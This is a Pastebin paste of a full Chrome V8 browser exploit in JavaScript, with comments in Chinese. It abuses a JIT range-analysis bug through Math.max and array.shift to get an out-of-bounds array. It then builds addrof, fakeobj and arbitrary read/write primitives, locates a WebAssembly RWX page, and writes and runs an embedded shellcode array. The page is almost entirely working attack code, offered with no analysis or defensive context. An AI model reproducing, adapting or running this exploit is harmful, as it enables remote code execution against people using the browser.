API tools faq
paste
xosski

Chrome var wasm_code

xosski
Oct 3rd, 2024
37
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.60 KB | None | 0 0
raw download clone embed print report
  1. var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
  2. var wasm_mod = new WebAssembly.Module(wasm_code);
  3. var wasm_instance = new WebAssembly.Instance(wasm_mod);
  4. var wasm_function = wasm_instance.exports.main;
  5. var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
  6.  
  7. let arb_write_buffer = new ArrayBuffer(0x300);
  8.  
  9. // 用来实现类型转换
  10. class Helpers {
  11. constructor() {
  12. this.buf =new ArrayBuffer(16);
  13. this.uint32 = new Uint32Array(this.buf);
  14. this.float64 = new Float64Array(this.buf);
  15. this.big_uint64 = new BigUint64Array(this.buf);
  16. }
  17.  
  18. // float-->uint
  19. f2i(f)
  20. {
  21. this.float64[0] = f;
  22. return this.big_uint64[0];
  23. }
  24. // uint-->float
  25. i2f(i)
  26. {
  27. this.big_uint64[0] = i;
  28. return this.float64[0];
  29. }
  30. // 64-->32
  31. f2half(val)
  32. {
  33. this.float64[0]= val;
  34. let tmp = Array.from(this.uint32);
  35. return tmp;
  36. }
  37. // 32-->64
  38. half2f(val)
  39. {
  40. this.uint32.set(val);
  41. return this.float64[0];
  42. }
  43.  
  44. hex(a) {
  45. return "0x" + a.toString(16);
  46. }
  47.  
  48. gc() { for(let i = 0; i < 100; i++) { new ArrayBuffer(0x1000000); } }
  49. }
  50.  
  51. function foo(flag) {
  52. // 触发漏洞,使得len==1且Range为(-4294967295, 0)
  53. let x = -1;
  54. if (flag) x = 0xFFFF_FFFF;
  55. let len = 0 - Math.max(0, x);
  56. // 利用array.shift()来构造出长度为-1(0xFFFFFFFE)的数组
  57. let vuln_array = new Array(len);
  58. vuln_array.shift();
  59.  
  60. let oob_array = [1.1, 1.2, 1.3];
  61.  
  62. if (flag) {
  63. //%DebugPrint(oob_array);
  64. //%SystemBreak();
  65. }
  66. return [vuln_array, oob_array];
  67. }
  68.  
  69. function confusion_to_oob() {
  70. console.log("[+] convert confusion to oob......");
  71. // 触发JIT
  72. for (let i=0; i<0x10000; i++) {foo(false);}
  73. // gc
  74. helper.gc();
  75. // 修改oob_array的length
  76. [vuln_array, oob_array] = foo(true);
  77. vuln_array[16] = 0xc00c;
  78.  
  79. console.log(" oob_array.length: " + helper.hex(oob_array.length));
  80. }
  81.  
  82. function addrof(obj) {
  83. vuln_array[7] = obj;
  84.  
  85. return helper.f2i(oob_array[0]) & 0xFFFF_FFFFn;
  86. }
  87.  
  88. function fakeobj(addr) {
  89. oob_array[0] = helper.i2f(addr);
  90.  
  91. return vuln_array[7];
  92. }
  93.  
  94. function get_arw() {
  95. console.log("[+] get absolute read/write access......");
  96.  
  97. let oob_array_map_and_properties = helper.f2i(oob_array[3]);
  98. point_array = [helper.i2f(oob_array_map_and_properties), 1.1, 1.2, 1.3];
  99. fake = fakeobj(addrof(point_array) - 0x20n);
  100. }
  101.  
  102. function arb_read(addr) {
  103. if (addr %2n == 0) {
  104. addr += 1n;
  105. }
  106. // 2n << 32n是为了填充length字段,在指针压缩下length的值会被改为0x1;
  107. // -8n是因为elements字段指向的内容会自动+8来跳过map和length
  108. point_array[1] = helper.i2f((2n << 32n) + addr -8n);
  109. return fake[0];
  110. }
  111.  
  112. function arb_write(addr, val) {
  113. if (addr %2n == 0) {
  114. addr += 1n;
  115. }
  116. // 2n << 32n是为了填充length字段,在指针压缩下length的值会被改为0x1;
  117. // -8n是因为elements字段指向的内容会自动+8来跳过map和length
  118. point_array[1] = helper.i2f((2n << 32n) + addr -8n);
  119. fake[0] = helper.i2f(BigInt(val));
  120. }
  121.  
  122. function get_wasm_rwx() {
  123. console.log("[+] get address of rwx page......");
  124. rwx_page_addr = helper.f2i(arb_read(addrof(wasm_instance) + 0x68n));
  125. //%DebugPrint(wasm_instance);
  126. //%DebugPrint(wasm_function);
  127. console.log(" Address of rwx page: " + helper.hex(rwx_page_addr));
  128. //%SystemBreak();
  129. }
  130.  
  131. function run_shellcode(addr, shellcode) {
  132. console.log("[+] run shellcode......");
  133. let dataview = new DataView(arb_write_buffer);
  134. let buf_addr = addrof(arb_write_buffer);
  135. let backing_store_addr = buf_addr + 0x14n;
  136. arb_write(backing_store_addr, addr);
  137. for (let i = 0; i < shellcode.length; i++) {
  138. dataview.setUint32(4*i, shellcode[i], true);
  139. }
  140. console.log("[+] success!!!");
  141. }
  142.  
  143. function exp() {
  144. helper = new Helpers();
  145.  
  146. confusion_to_oob();
  147. get_arw();
  148. get_wasm_rwx();
  149. run_shellcode(rwx_page_addr, shellcode);
  150. wasm_function();
  151. }
  152.  
  153. exp();
Tags: Code chrome wasm_code
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!